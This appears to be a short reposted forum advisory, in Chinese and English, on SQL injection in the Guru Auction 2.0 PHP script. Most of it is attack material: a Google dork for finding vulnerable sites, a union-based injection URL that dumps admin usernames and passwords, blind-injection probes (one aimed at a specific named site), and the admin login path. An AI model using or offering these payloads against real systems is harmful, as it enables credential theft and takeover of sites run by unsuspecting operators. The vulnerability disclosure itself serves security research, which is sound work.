Guru Auction 2.0多重sql注射
Guru Auction 2.0 Multiple SQL Injection Vulnerabilities作者 : v3n0m
应用 : Guru Auction 2.0
Price : $49
Vendor : http://www.guruscript.com/
Google Dork : inurl:subcat.php?cate_id=
SQLi p0c:
~~~~~~~~~~
http://domain.tld//subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
盲注 p0c:
~~~~~~~~~~
http://www.political-security.com //detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
http://domain.tld//detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
管理登录入口:
~~~~~~~~~~
http://domain.tld//admin/
页:
[1]